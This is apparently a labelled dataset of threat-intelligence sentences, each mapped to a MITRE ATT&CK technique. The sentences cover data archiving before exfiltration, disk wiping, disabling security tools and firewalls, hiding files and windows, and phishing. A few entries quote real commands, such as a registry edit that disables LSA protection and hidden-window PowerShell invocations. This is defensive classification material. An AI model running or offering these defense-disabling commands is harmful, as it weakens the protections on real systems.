{"text1":"Lurid can compress data before sending it.","labels":"['T1560']"}
{"text1":"NETWIRE has the ability to compress archived screenshots.","labels":"['T1560']"}
{"text1":"Patchwork encrypted the collected files' path with AES and then encoded them with base64.","labels":"['T1560']"}
{"text1":"PowerLess can encrypt browser database files prior to exfiltration.","labels":"['T1560']"}
{"text1":"Proton zips up files before exfiltrating them.","labels":"['T1560']"}
{"text1":"ShimRatReporter used LZ compression to compress initial reconnaissance reports before sending to the C2.","labels":"['T1560']"}
{"text1":"TAINTEDSCRIBE has used \"FileReadZipSend\" to compress a file and send to C2.","labels":"['T1560']"}
{"text1":"VERMIN encrypts the collected files using 3-DES.","labels":"['T1560']"}
{"text1":"WellMail can archive files on the compromised host.","labels":"['T1560']"}
{"text1":"XCSSET will compress entire \"~\/Desktop\" folders excluding all \".git\" folders, but only if the total data size is under 200MB.","labels":"['T1560']"}
{"text1":"Zebrocy  has used a method similar to RC4 as well as AES for encryption and hexadecimal for encoding data before exfiltration.","labels":"['T1560']"}
{"text1":"menuPass has encrypted files and information before exfiltration.","labels":"['T1560']"}
{"text1":"APT1 has used RAR to compress files before moving them outside of the victim network.","labels":"['T1560.001']"}
{"text1":"APT3 has used tools to compress data before exfilling it.","labels":"['T1560.001']"}
{"text1":"APT39 has used WinRAR and 7-Zip to compress an archive stolen data.","labels":"['T1560.001']"}
{"text1":"APT41 created a RAR archive of targeted files for exfiltration.","labels":"['T1560.001']"}
{"text1":"Aquatic Panda has used WinRAR to compress memory dumps prior to exfiltration.","labels":"['T1560.001']"}
{"text1":"BRONZE BUTLER has compressed data into password-protected RAR archives prior to exfiltration.","labels":"['T1560.001']"}
{"text1":"Calisto uses the \"zip -r\" command to compress the data collected on the local system.","labels":"['T1560.001']"}
{"text1":"Chimera has used gzip for Linux OS and a modified RAR software to archive data on Windows hosts.","labels":"['T1560.001']"}
{"text1":"CopyKittens uses ZPP, a .NET console program, to compress files with ZIP.","labels":"['T1560.001']"}
{"text1":"Crutch has used the WinRAR utility to compress and encrypt stolen files.","labels":"['T1560.001']"}
{"text1":"During FunnyDream, the threat actors used 7zr.exe to add collected files to an archive.","labels":"['T1560.001']"}
{"text1":"During Operation CuckooBees, the threat actors used the Makecab utility to compress and a version of WinRAR to create password-protected archives of stolen data prior to exfiltration.","labels":"['T1560.001']"}
{"text1":"During Operation Honeybee, the threat actors uses zip to pack collected files before exfiltration.","labels":"['T1560.001']"}
{"text1":"During Operation Wocao, threat actors archived collected files with WinRAR, prior to exfiltration.","labels":"['T1560.001']"}
{"text1":"DustySky can compress files via RAR while staging data to be exfiltrated.","labels":"['T1560.001']"}
{"text1":"Fox Kitten has used 7-Zip to archive data.","labels":"['T1560.001']"}
{"text1":"GALLIUM used WinRAR to compress and encrypt stolen data prior to exfiltration.","labels":"['T1560.001']"}
{"text1":"HAFNIUM has used 7-Zip and WinRAR to compress stolen files for exfiltration.","labels":"['T1560.001']"}
{"text1":"IceApple can encrypt and compress files using Gzip prior to exfiltration.","labels":"['T1560.001']"}
{"text1":"InvisiMole uses WinRAR to compress data that is intended to be exfiltrated.","labels":"['T1560.001']"}
{"text1":"Ke3chang is known to use 7Zip and RAR with passwords to encrypt data prior to exfiltration.","labels":"['T1560.001']"}
{"text1":"Kimsuky has used QuickZip to archive stolen files before exfiltration.","labels":"['T1560.001']"}
{"text1":"Micropsia creates a RAR archive based on collected files on the victim's machine.","labels":"['T1560.001']"}
{"text1":"MuddyWater has used the native Windows cabinet creation tool, makecab.exe, likely to compress stolen data to be uploaded.","labels":"['T1560.001']"}
{"text1":"Mustang Panda has used RAR to create password-protected archives of collected documents prior to exfiltration.","labels":"['T1560.001']"}
{"text1":"Octopus has compressed data before exfiltrating it using a tool called Abbrevia.","labels":"['T1560.001']"}
{"text1":"OopsIE compresses collected files with GZipStream before sending them to its C2 server.","labels":"['T1560.001']"}
{"text1":"PUNCHBUGGY has Gzipped information and saved it to a random temp file before exfil.","labels":"['T1560.001']"}
{"text1":"PoetRAT has the ability to compress files with zip.","labels":"['T1560.001']"}
{"text1":"PoshC2 contains a module for compressing data using ZIP.","labels":"['T1560.001']"}
{"text1":"PowerShower has used 7Zip to compress .txt, .pdf, .xls or .doc files prior to exfiltration.","labels":"['T1560.001']"}
{"text1":"Pupy can compress data with Zip before sending it over C2.","labels":"['T1560.001']"}
{"text1":"Ramsay can compress and archive collected files using WinRAR.","labels":"['T1560.001']"}
{"text1":"Turian can use WinRAR to create a password-protected archive for files of interest.","labels":"['T1560.001']"}
{"text1":"UNC2452 used 7-Zip to compress stolen emails into password-protected archives prior to exfiltration.","labels":"['T1560.001']"}
{"text1":"WindTail has the ability to use the macOS built-in zip utility to archive files.","labels":"['T1560.001']"}
{"text1":"iKitten will zip up the \/Library\/Keychains directory before exfiltrating it.","labels":"['T1560.001']"}
{"text1":"BADFLICK has compressed data using the aPLib compression library.","labels":"['T1560.002']"}
{"text1":"Epic compresses the collected data with bzip2 before sending it to the C2 server.","labels":"['T1560.002']"}
{"text1":"Gelsemium can compress embedded executables with the zlib library.","labels":"['T1560.002']"}
{"text1":"InvisiMole can use zlib to compress and decompress data.","labels":"['T1560.002']"}
{"text1":"TajMahal has the ability to use the open source libraries XZip\/Xunzip and zlib to compress files.","labels":"['T1560.002']"}
{"text1":"Threat Group-3390 has used RAR to compress, encrypt, and password-protect files prior to exfiltration.","labels":"['T1560.002']"}
{"text1":"ADVSTORESHELL compresses output data generated by command execution with a custom implementation of the Lempel\u2013Ziv\u2013Welch (LZW) algorithm.","labels":"['T1560.003']"}
{"text1":"Agent.btz saves system information into an XML file that is then XOR-encoded.","labels":"['T1560.003']"}
{"text1":"BLUELIGHT has encoded data into a binary blob using XOR.","labels":"['T1560.003']"}
{"text1":"CopyKittens encrypts data with a substitute cipher prior to exfiltration.","labels":"['T1560.003']"}
{"text1":"FLASHFLOOD employs the same encoding scheme as SPACESHIP for data it stages. Data is compressed with zlib, and bytes are rotated four times before being XOR'ed with 0x23.","labels":"['T1560.003']"}
{"text1":"FunnyDream has compressed collected files with zLib and encrypted them using an XOR operation with the string key from the command line or `qwerasdf` if the command line argument doesn\u2019t contain the key. File names are obfuscated using XOR with the same key as the compressed file content.","labels":"['T1560.003']"}
{"text1":"HAWKBALL has encrypted data with XOR before sending it over the C2 channel.","labels":"['T1560.003']"}
{"text1":"InvisiMole uses a variation of the XOR cipher to encrypt files before exfiltration.","labels":"['T1560.003']"}
{"text1":"MESSAGETAP has XOR-encrypted and stored contents of SMS messages that matched its target list.","labels":"['T1560.003']"}
{"text1":"Machete's collected data is encrypted with AES before exfiltration.","labels":"['T1560.003']"}
{"text1":"Okrum has used a custom implementation of AES encryption to encrypt collected data.","labels":"['T1560.003']"}
{"text1":"OopsIE compresses collected files with a simple character replacement scheme before sending them to its C2 server.","labels":"['T1560.003']"}
{"text1":"OwaAuth DES-encrypts captured credentials using the key 12345678 before writing the credentials to a log file.","labels":"['T1560.003']"}
{"text1":"RGDoor encrypts files with XOR before sending them back to the C2 server.","labels":"['T1560.003']"}
{"text1":"Ramsay can store collected documents in a custom container after encrypting and compressing them using RC4 and WinRAR.","labels":"['T1560.003']"}
{"text1":"Reaver encrypts collected data with an incremental XOR key prior to exfiltration.","labels":"['T1560.003']"}
{"text1":"Rising Sun can archive data using RC4 encryption and Base64 encoding prior to exfiltration.","labels":"['T1560.003']"}
{"text1":"SombRAT has encrypted collected data with AES-256 using a hardcoded key.","labels":"['T1560.003']"}
{"text1":"Squirrelwaffle has encrypted collected data using a XOR-based algorithm.","labels":"['T1560.003']"}
{"text1":"StrongPity can compress and encrypt archived files into multiple .sft files with a repeated xor encryption scheme.","labels":"['T1560.003']"}
{"text1":"Stuxnet encrypts exfiltrated data via C2 with static 31-byte long XOR keys.","labels":"['T1560.003']"}
{"text1":"HermeticWiper has the ability to corrupt disk partitions and obtain raw disk access to destroy data.","labels":"['T1561.001']"}
{"text1":"MegaCortex can wipe deleted data from all drives using \"cipher.exe\".","labels":"['T1561.001']"}
{"text1":"RawDisk has been used to directly access the hard disk to help overwrite arbitrarily sized portions of disk content.","labels":"['T1561.001']"}
{"text1":"StoneDrill can wipe the accessible physical or logical drives of the infected machine.","labels":"['T1561.001']"}
{"text1":"WhisperGate can overwrite sectors of a victim host's hard drive at periodic offsets.","labels":"['T1561.001']"}
{"text1":"APT37 has access to destructive malware that is capable of overwriting a machine's Master Boot Record (MBR).","labels":"['T1561.002']"}
{"text1":"APT38 has used a custom MBR wiper named BOOTWRECK to render systems inoperable.","labels":"['T1561.002']"}
{"text1":"CaddyWiper has the ability to destroy information about a physical drive's partitions including the MBR, GPT, and partition entries.","labels":"['T1561.002']"}
{"text1":"HermeticWiper has the ability to corrupt disk partitions, damage the Master Boot Record (MBR), and overwrite the Master File Table (MFT) of all available physical drives.","labels":"['T1561.002']"}
{"text1":"KillDisk overwrites the first sector of the Master Boot Record with \u201c0x00\u201d.","labels":"['T1561.002']"}
{"text1":"Lazarus Group malware SHARPKNOT overwrites and deletes the Master Boot Record (MBR) on the victim's machine and has possessed MBR wiper malware since at least 2009.","labels":"['T1561.002']"}
{"text1":"Sandworm Team has used the BlackEnergy KillDisk component to corrupt the infected system's master boot record.","labels":"['T1561.002']"}
{"text1":"Shamoon has been seen overwriting features of disk structure such as the MBR.","labels":"['T1561.002']"}
{"text1":"WhisperGate can overwrite the Master Book Record (MBR) on victim systems with a malicious 16-bit bootloader.","labels":"['T1561.002']"}
{"text1":"Magic Hound has disabled LSA protection on compromised hosts using `\"reg\" add HKLM\\SYSTEM\\CurrentControlSet\\Control\\LSA \/v RunAsPPL \/t REG_DWORD \/d 0 \/f`.","labels":"['T1562']"}
{"text1":"Stuxnet reduces the integrity level of objects to allow write actions.","labels":"['T1562']"}
{"text1":"APT29 used the service control manager on a remote system to disable services associated with security monitoring products.","labels":"['T1562.001']"}
{"text1":"Agent Tesla has the capability to kill any running analysis processes and AV software.","labels":"['T1562.001']"}
{"text1":"Aquatic Panda has attempted to stop endpoint detection and response (EDR) tools on compromised systems.","labels":"['T1562.001']"}
{"text1":"BRONZE BUTLER has incorporated code into several tools that attempts to terminate anti-virus processes.","labels":"['T1562.001']"}
{"text1":"Babuk can stop anti-virus services on a compromised host.","labels":"['T1562.001']"}
{"text1":"Brave Prince terminates antimalware processes.","labels":"['T1562.001']"}
{"text1":"Carberp has attempted to disable security software by creating a suspended process for the security software and injecting code to delete antivirus core files when the process is resumed.","labels":"['T1562.001']"}
{"text1":"ChChes can alter the victim's proxy configuration.","labels":"['T1562.001']"}
{"text1":"Clop can uninstall or disable security products.","labels":"['T1562.001']"}
{"text1":"Cobalt Strike has the ability to use Smart Applet attacks to disable the Java SecurityManager sandbox.","labels":"['T1562.001']"}
{"text1":"Conficker terminates various services related to system security and Windows.","labels":"['T1562.001']"}
{"text1":"DarkComet can disable Security Center functions like anti-virus.","labels":"['T1562.001']"}
{"text1":"Diavol can attempt to stop security software.","labels":"['T1562.001']"}
{"text1":"Donut can patch Antimalware Scan Interface (AMSI), Windows Lockdown Policy (WLDP), as well as exit-related Native API functions to avoid process termination.","labels":"['T1562.001']"}
{"text1":"During Night Dragon, threat actors disabled anti-virus and anti-spyware tools in some instances on the victim\u2019s machines. The actors also disabled proxy settings to allow direct communication from victims to the Internet.","labels":"['T1562.001']"}
{"text1":"Ebury can disable SELinux Role-Based Access Control and deactivate PAM modules.","labels":"['T1562.001']"}
{"text1":"Egregor has disabled Windows Defender to evade protections.","labels":"['T1562.001']"}
{"text1":"FIN6 has deployed a utility script named \"kill.bat\" to disable anti-virus.","labels":"['T1562.001']"}
{"text1":"Gamaredon Group has delivered macros which can tamper with Microsoft Office security settings.","labels":"['T1562.001']"}
{"text1":"Gold Dragon terminates anti-malware processes if they\u2019re found running on the system.","labels":"['T1562.001']"}
{"text1":"Goopy has the ability to disable Microsoft Outlook's security policies to disable macro warnings.","labels":"['T1562.001']"}
{"text1":"Grandoreiro can hook APIs, kill processes, break file system paths, and change ACLs to prevent security tools from running.","labels":"['T1562.001']"}
{"text1":"H1N1 kills and disables services for Windows Security Center, and Windows Defender.","labels":"['T1562.001']"}
{"text1":"HDoor kills anti-virus found on the victim.","labels":"['T1562.001']"}
{"text1":"Hildegard has modified DNS resolvers to evade DNS monitoring tools.","labels":"['T1562.001']"}
{"text1":"Imminent Monitor has a feature to disable Windows Task Manager.","labels":"['T1562.001']"}
{"text1":"Indrik Spider used PsExec to leverage Windows Defender to disable scanning of all downloaded files and to restrict real-time monitoring.","labels":"['T1562.001']"}
{"text1":"JPIN can lower security settings by changing Registry keys.","labels":"['T1562.001']"}
{"text1":"KOCTOPUS will attempt to delete or disable all Registry keys and scheduled tasks related to Microsoft Security Defender and Security Essentials.","labels":"['T1562.001']"}
{"text1":"Kimsuky has been observed turning off Windows Security Center and can hide the AV software window from the view of the infected user.","labels":"['T1562.001']"}
{"text1":"Lazarus Group malware TangoDelta attempts to terminate various processes associated with McAfee. Additionally, Lazarus Group malware SHARPKNOT disables the Microsoft Windows System Event Notification and Alerter services..","labels":"['T1562.001']"}
{"text1":"Metamorfo has a function to kill processes associated with defenses and can prevent certain processes from launching.","labels":"['T1562.001']"}
{"text1":"Meteor can attempt to uninstall Kaspersky Antivirus or remove the Kaspersky license; it can also add all files and folders related to the attack to the Windows Defender exclusion list.","labels":"['T1562.001']"}
{"text1":"MuddyWater can disable the system's local proxy settings.","labels":"['T1562.001']"}
{"text1":"NanHaiShu can change Internet Explorer settings to reduce warnings about malware activity.","labels":"['T1562.001']"}
{"text1":"NanoCore can modify the victim's anti-virus.","labels":"['T1562.001']"}
{"text1":"Night Dragon has disabled anti-virus and anti-spyware tools in some instances on the victim\u2019s machines. The actors have also disabled proxy settings to allow direct communication from victims to the Internet.","labels":"['T1562.001']"}
{"text1":"POWERSTATS can disable Microsoft Office Protected View by changing Registry keys.","labels":"['T1562.001']"}
{"text1":"Proton kills security tools like Wireshark that are running.","labels":"['T1562.001']"}
{"text1":"Pysa has the capability to stop antivirus services and disable Windows Defender.","labels":"['T1562.001']"}
{"text1":"QakBot has the ability to modify the Registry to add its binaries to the Windows Defender exclusion list.","labels":"['T1562.001']"}
{"text1":"REvil can connect to and disable the Symantec server on the victim's network.","labels":"['T1562.001']"}
{"text1":"Ragnar Locker has attempted to terminate\/stop processes and services associated with endpoint security products.","labels":"['T1562.001']"}
{"text1":"RobbinHood will search for Windows services that are associated with antivirus software on the system and kill the process.","labels":"['T1562.001']"}
{"text1":"Ryuk has stopped services related to anti-virus.","labels":"['T1562.001']"}
{"text1":"SILENTTRINITY's `amsiPatch.py` module can disable Antimalware Scan Interface (AMSI) functions.","labels":"['T1562.001']"}
{"text1":"SUNBURST attempted to disable software security services following checks against a FNV-1a + XOR hashed hardcoded blocklist.","labels":"['T1562.001']"}
{"text1":"Skidmap has the ability to set SELinux to permissive mode.","labels":"['T1562.001']"}
{"text1":"SslMM identifies and kills anti-malware processes.","labels":"['T1562.001']"}
{"text1":"TA505 has used malware to disable Windows Defender.","labels":"['T1562.001']"}
{"text1":"TeamTNT has disabled and uninstalled security tools such as Alibaba, Tencent, and BMC cloud monitoring agents on cloud-based infrastructure.","labels":"['T1562.001']"}
{"text1":"TinyZBot can disable Avira anti-virus.","labels":"['T1562.001']"}
{"text1":"TrickBot can disable Windows Defender.","labels":"['T1562.001']"}
{"text1":"Turla has used a AMSI bypass, which patches the in-memory amsi.dll, in PowerShell scripts to bypass Windows antimalware products.","labels":"['T1562.001']"}
{"text1":"UNC2452 used the service control manager on a remote system to disable services associated with security monitoring products.","labels":"['T1562.001']"}
{"text1":"Unknown Logger has functionality to disable security tools, including Kaspersky, BitDefender, and MalwareBytes.","labels":"['T1562.001']"}
{"text1":"WarzoneRAT can disarm Windows Defender during the UAC process to evade detection.","labels":"['T1562.001']"}
{"text1":"WhisperGate can download and execute AdvancedRun.exe to disable the Windows Defender Theat Protection service and set an exclusion path for the C:\\ drive.","labels":"['T1562.001']"}
{"text1":"Wizard Spider has shut down or uninstalled security applications on victim systems that might prevent ransomware from executing.","labels":"['T1562.001']"}
{"text1":"ZxShell can kill AV products' processes.","labels":"['T1562.001']"}
{"text1":"macOS.OSAMiner has searched for the Activity Monitor process in the System Events process list and kills the process if running. macOS.OSAMiner also searches the operating system's `install.log` for apps matching its hardcoded list, killing all matching process names.","labels":"['T1562.001']"}
{"text1":"APT29 used \"AUDITPOL\" to prevent the collection of audit logs.","labels":"['T1562.002']"}
{"text1":"Sandworm Team has disabled event logging on compromised systems.","labels":"['T1562.002']"}
{"text1":"UNC2452 used \"AUDITPOL\" to prevent the collection of audit logs.","labels":"['T1562.002']"}
{"text1":"Wevtutil can be used to disable specific event logs on the system.","labels":"['T1562.002']"}
{"text1":"APT29 used \"netsh\" to configure firewall rules that limited certain UDP outbound packets.","labels":"['T1562.004']"}
{"text1":"APT38 have created firewall exemptions on specific ports, including ports 443, 6443, 8443, and 9443.","labels":"['T1562.004']"}
{"text1":"Carbanak may use netsh to add local firewall rule exceptions.","labels":"['T1562.004']"}
{"text1":"Dragonfly has disabled host-based firewalls. The group has also globally opened port 3389.","labels":"['T1562.004']"}
{"text1":"During Operation Wocao, threat actors used PowerShell to add and delete rules in the Windows firewall.","labels":"['T1562.004']"}
{"text1":"Grandoreiro can block the Deibold Warsaw GAS Tecnologia security tool at the firewall level.","labels":"['T1562.004']"}
{"text1":"HARDRAIN opens the Windows Firewall to modify incoming connections.","labels":"['T1562.004']"}
{"text1":"HOPLIGHT has modified the firewall using netsh.","labels":"['T1562.004']"}
{"text1":"InvisiMole has a command to disable routing and the Firewall on the victim\u2019s machine.","labels":"['T1562.004']"}
{"text1":"Kasidet has the ability to change firewall settings to allow a plug-in to be downloaded.","labels":"['T1562.004']"}
{"text1":"Moses Staff has used batch scripts that can disable the Windows firewall on specific remote machines.","labels":"['T1562.004']"}
{"text1":"NanoCore can modify the victim's firewall.","labels":"['T1562.004']"}
{"text1":"Operation Wocao has used PowerShell to add and delete rules in the Windows firewall.","labels":"['T1562.004']"}
{"text1":"Remsec can add or remove applications or ports on the Windows firewall or disable it entirely.","labels":"['T1562.004']"}
{"text1":"Rocke used scripts which killed processes and added firewall rules to block traffic related to other cryptominers.","labels":"['T1562.004']"}
{"text1":"TeamTNT has disabled \"iptables\".","labels":"['T1562.004']"}
{"text1":"The \"ZR\" variant of BACKSPACE will check to see if known host-based firewalls are installed on the infected systems. BACKSPACE will attempt to establish a C2 channel, then will examine open windows to identify a pop-up from the firewall software and will simulate a mouse-click to allow the connection to proceed.","labels":"['T1562.004']"}
{"text1":"njRAT has modified the Windows firewall to allow itself to communicate through the firewall.","labels":"['T1562.004']"}
{"text1":"Waterbear can hook the \"ZwOpenProcess\" and \"GetExtendedTcpTable\" APIs called by the process of a security product to hide PIDs and TCP records from detection.","labels":"['T1562.006']"}
{"text1":"Axiom has targeted victims with remote administration tools including RDP.","labels":"['T1563.002']"}
{"text1":"WannaCry enumerates current remote desktop sessions and tries to execute the malware on each session.","labels":"['T1563.002']"}
{"text1":"Bundlore uses the \"mktemp\" utility to make unique file and directory names for payloads, such as \"TMP_DIR=`mktemp -d -t x\".","labels":"['T1564']"}
{"text1":"OSX\/Shlayer has used the \"mktemp\" utility to make random and unique filenames for payloads, such as \"export tmpDir=\"$(mktemp -d \/tmp\/XXXXXXXXXXXX)\"\" or \"mktemp -t Installer\".","labels":"['T1564']"}
{"text1":"APT32's macOS backdoor hides the clientID file via a chflags function.","labels":"['T1564.001']"}
{"text1":"AppleJeus has added a leading \".\" to plist filenames, unlisting them from the Finder app and default Terminal directory listings.","labels":"['T1564.001']"}
{"text1":"Attor can set attributes of log files and directories to HIDDEN, SYSTEM, ARCHIVE, or a combination of those.","labels":"['T1564.001']"}
{"text1":"Before exfiltration, Okrum's backdoor has used hidden files to store logs and outputs from backdoor commands.","labels":"['T1564.001']"}
{"text1":"Carberp has created a hidden file in the Startup folder of the current user.","labels":"['T1564.001']"}
{"text1":"Clambling has the ability to set its file attributes to hidden.","labels":"['T1564.001']"}
{"text1":"EnvyScout can use hidden directories and files to hide malicious executables.","labels":"['T1564.001']"}
{"text1":"Explosive has commonly set file and path attributes to hidden.","labels":"['T1564.001']"}
{"text1":"FruitFly saves itself with a leading \".\" to make it a hidden file.","labels":"['T1564.001']"}
{"text1":"Imminent Monitor has a dynamic debugging feature to set the file attribute to hidden.","labels":"['T1564.001']"}
{"text1":"InvisiMole can create hidden system directories.","labels":"['T1564.001']"}
{"text1":"Lazarus Group has used a VBA Macro to set its file attributes to System and Hidden and has named files with a dot prefix to hide them from the Finder application.","labels":"['T1564.001']"}
{"text1":"LoudMiner has set the attributes of the VirtualBox directory and VBoxVmService parent directory to \"hidden\".","labels":"['T1564.001']"}
{"text1":"MacSpy stores itself in \"~\/Library\/.DS_Stores\/\"","labels":"['T1564.001']"}
{"text1":"Machete has the capability to exfiltrate stolen data to a hidden folder on a removable drive.","labels":"['T1564.001']"}
{"text1":"Mustang Panda's PlugX variant has created a hidden folder on USB drives named \"RECYCLE.BIN\" to store malicious executables and collected data.","labels":"['T1564.001']"}
{"text1":"NETWIRE can copy itself to and launch itself from hidden folders.","labels":"['T1564.001']"}
{"text1":"OSX\/Shlayer has executed a .command script from a hidden directory in a mounted DMG.","labels":"['T1564.001']"}
{"text1":"OSX_OCEANLOTUS.D sets the main loader file\u2019s attributes to hidden.","labels":"['T1564.001']"}
{"text1":"PlugX can modify the characteristics of folders to hide them from the compromised user.","labels":"['T1564.001']"}
{"text1":"PoetRAT has the ability to hide and unhide files.","labels":"['T1564.001']"}
{"text1":"QuasarRAT has the ability to set file attributes to \"hidden\" to hide files from the compromised user's view in Windows File Explorer.","labels":"['T1564.001']"}
{"text1":"Rising Sun can modify file attributes to hide files.","labels":"['T1564.001']"}
{"text1":"Rocke downloaded a file \"libprocesshider\", which could hide files on the target system.","labels":"['T1564.001']"}
{"text1":"SLOTHFULMEDIA has been created with a hidden attribute to insure it's not visible to the victim.","labels":"['T1564.001']"}
{"text1":"The Komplex payload is stored in a hidden directory at \"\/Users\/Shared\/.local\/kextd\".","labels":"['T1564.001']"}
{"text1":"ThiefQuest hides a copy of itself in the user's \"~\/Library\" directory by using a \".\" at the beginning of the file name followed by 9 random characters.","labels":"['T1564.001']"}
{"text1":"Tropic Trooper has created a hidden directory under \"C:\\ProgramData\\Apple\\Updates\\\" and \"C:\\Users\\Public\\Documents\\Flash\\\".","labels":"['T1564.001']"}
{"text1":"WannaCry uses \"attrib +h\" to make some of its files hidden.","labels":"['T1564.001']"}
{"text1":"WastedLocker has copied a random file from the Windows System32 folder to the \"%APPDATA%\" location under a different hidden filename.","labels":"['T1564.001']"}
{"text1":"XCSSET uses a hidden folder named \".xcassets\" and \".git\" to embed itself in Xcode.","labels":"['T1564.001']"}
{"text1":"ccf32 has created a hidden directory on targeted systems, naming it after the current local time (year, month, and day).","labels":"['T1564.001']"}
{"text1":"iKitten saves itself with a leading \".\" so that it's hidden from users by default.","labels":"['T1564.001']"}
{"text1":"Dragonfly 2.0 modified the Registry to hide create user accounts.","labels":"['T1564.002']"}
{"text1":"APT3 has been known to use \"-WindowStyle Hidden\" to conceal PowerShell windows.","labels":"['T1564.003']"}
{"text1":"APT32 has used the WindowStyle parameter to conceal PowerShell windows.","labels":"['T1564.003']"}
{"text1":"Agent Tesla has used \"ProcessWindowStyle.Hidden\" to hide windows.","labels":"['T1564.003']"}
{"text1":"BONDUPDATER uses \"-windowstyle hidden\" to conceal a PowerShell window that downloads a payload.","labels":"['T1564.003']"}
{"text1":"CopyKittens has used \"-w hidden\" and \"-windowstyle hidden\" to conceal PowerShell windows.","labels":"['T1564.003']"}
{"text1":"Cuba has executed hidden PowerShell windows.","labels":"['T1564.003']"}
{"text1":"DarkHydrus has used \"-WindowStyle Hidden\" to conceal PowerShell windows.","labels":"['T1564.003']"}
{"text1":"Deep Panda has used \"-w hidden\" to conceal PowerShell windows by setting the WindowStyle parameter to hidden.","labels":"['T1564.003']"}
{"text1":"Gamaredon Group has used \"hidcon\" to run batch files in a hidden console window.","labels":"['T1564.003']"}
{"text1":"Gorgon Group has used \"-W Hidden\" to conceal PowerShell windows by setting the WindowStyle parameter to hidden.","labels":"['T1564.003']"}
{"text1":"HAMMERTOSS has used \"-WindowStyle hidden\" to conceal PowerShell windows.","labels":"['T1564.003']"}
{"text1":"KOCTOPUS has used \"-WindowsStyle Hidden\" to hide the command window.","labels":"['T1564.003']"}
{"text1":"Kevin can hide the current window from the targeted user via the `ShowWindow` API function.","labels":"['T1564.003']"}
{"text1":"KeyBoy uses \"-w Hidden\" to conceal a PowerShell window that downloads a payload.","labels":"['T1564.003']"}
{"text1":"Kimsuky has used an information gathering module that will hide an AV software window from the victim.","labels":"['T1564.003']"}
{"text1":"Kivars has the ability to conceal its activity through hiding active windows.","labels":"['T1564.003']"}
{"text1":"Koadic has used the command \"Powershell.exe -ExecutionPolicy Bypass -WindowStyle Hidden\" to hide its window.","labels":"['T1564.003']"}
{"text1":"Metamorfo has hidden its GUI using the ShowWindow() WINAPI call.","labels":"['T1564.003']"}
{"text1":"Nomadic Octopus executed PowerShell in a hidden window.","labels":"['T1564.003']"}
{"text1":"QuasarRAT can hide process windows and make web requests invisible to the compromised user. Requests marked as invisible have been sent with user-agent string `Mozilla\/5.0 (Macintosh; Intel Mac OS X 10_9_3) AppleWebKit\/537.75.14 (KHTML, like Gecko) Version\/7.0.3 Safari\/7046A194A` though QuasarRAT can only be run on Windows systems.","labels":"['T1564.003']"}
{"text1":"QuietSieve has the ability to execute payloads in a hidden window.","labels":"['T1564.003']"}
{"text1":"SILENTTRINITY has the ability to set its window state to hidden.","labels":"['T1564.003']"}
{"text1":"Ursnif droppers have used COM properties to execute malware in hidden windows.","labels":"['T1564.003']"}
{"text1":"APT32 used NTFS alternate data streams to hide their payloads.","labels":"['T1564.004']"}
{"text1":"BitPaymer has copied itself to the \":bin\" alternate data stream of a newly created file.","labels":"['T1564.004']"}
{"text1":"Expand can be used to download or copy a file into an alternate data stream.","labels":"['T1564.004']"}
{"text1":"Gazer stores configuration items in alternate data streams (ADSs) if the Registry is not accessible.","labels":"['T1564.004']"}
{"text1":"LoJax has loaded an embedded NTFS DXE driver to be able to access and write to NTFS partitions.","labels":"['T1564.004']"}
{"text1":"PowerDuke hides many of its backdoor payloads in an alternate data stream (ADS).","labels":"['T1564.004']"}
{"text1":"Some variants of the Zeroaccess Trojan have been known to store data in Extended Attributes.","labels":"['T1564.004']"}
{"text1":"The Regin malware platform uses Extended Attributes to store encrypted executables.","labels":"['T1564.004']"}
{"text1":"Valak has the ability save and execute files as alternate data streams (ADS).","labels":"['T1564.004']"}
{"text1":"WastedLocker has the ability to save and execute files as an alternate data stream (ADS).","labels":"['T1564.004']"}
{"text1":"esentutl can be used to read and write alternate data streams.","labels":"['T1564.004']"}
{"text1":"BOOTRASH has used unallocated disk space between partitions for a hidden file system that stores components of the Nemesis bootkit.","labels":"['T1564.005']"}
{"text1":"ComRAT has used a portable FAT16 partition image placed in %TEMP% as a hidden file system.","labels":"['T1564.005']"}
{"text1":"Regin has used a hidden file system to store some of its components.","labels":"['T1564.005']"}
{"text1":"Strider has used a hidden file system that is stored as a file on disk.","labels":"['T1564.005']"}
{"text1":"Ragnar Locker has used VirtualBox and a stripped Windows XP virtual machine to run itself. The use of a shared folder specified in the configuration enables Ragnar Locker to encrypt files on the host operating system, including files on any mapped drives.","labels":"['T1564.006']"}
{"text1":"FIN4 has created rules in victims' Microsoft Outlook accounts to automatically delete emails containing words such as \u201chacked,\" \"phish,\" and \u201cmalware\" in a likely attempt to prevent organizations from communicating about their activities.","labels":"['T1564.008']"}
{"text1":"Keydnap uses a resource fork to present a macOS JPEG or text file icon rather than the executable's icon assigned by the operating system.","labels":"['T1564.009']"}
{"text1":"OSX\/Shlayer has used a resource fork to hide a compressed binary file of itself from the terminal, Finder, and potentially evade traditional scanners.","labels":"['T1564.009']"}
{"text1":"Cobalt Strike can use spoof arguments in spawned processes that execute beacon commands.","labels":"['T1564.010']"}
{"text1":"SombRAT has the ability to modify its process memory to hide process command-line arguments.","labels":"['T1564.010']"}
{"text1":"APT38 has used DYEPACK to create, delete, and alter records in databases used for SWIFT transactions.","labels":"['T1565.001']"}
{"text1":"SUNSPOT created a copy of the SolarWinds Orion software source file with a \".bk\" extension to backup the original content, wrote SUNBURST using the same filename but with a \".tmp\" extension, and then moved SUNBURST using \"MoveFileEx\" to the original filename with a \".cs\" extension so it could be compiled within Orion software.","labels":"['T1565.001']"}
{"text1":"APT38 has used DYEPACK to manipulate SWIFT messages en route to a printer.","labels":"['T1565.002']"}
{"text1":"Melcoz can monitor the clipboard for cryptocurrency addresses and change the intended address to one controlled by the adversary.","labels":"['T1565.002']"}
{"text1":"Metamorfo has a function that can watch the contents of the system clipboard for valid bitcoin addresses, which it then overwrites with the attacker's address.","labels":"['T1565.002']"}
{"text1":"APT38 has used DYEPACK.FOX to manipulate PDF data as it is accessed to remove traces of fraudulent SWIFT transactions from the data displayed to the end user.","labels":"['T1565.003']"}
{"text1":"Axiom has used spear phishing to initially compromise victims.","labels":"['T1566']"}
{"text1":"Dragonfly has used spearphising campaigns to gain access to victims.","labels":"['T1566']"}
{"text1":"Hikit has been spread through spear phishing.","labels":"['T1566']"}
{"text1":"APT-C-36 has used spearphishing emails with password protected RAR attachment to avoid being detected by the email gateway.","labels":"['T1566.001']"}
{"text1":"APT1 has sent spearphishing emails containing malicious attachments.","labels":"['T1566.001']"}
{"text1":"APT28 sent spearphishing emails containing malicious Microsoft Office and RAR attachments.","labels":"['T1566.001']"}
{"text1":"APT30 has used spearphishing emails with malicious DOC attachments.","labels":"['T1566.001']"}
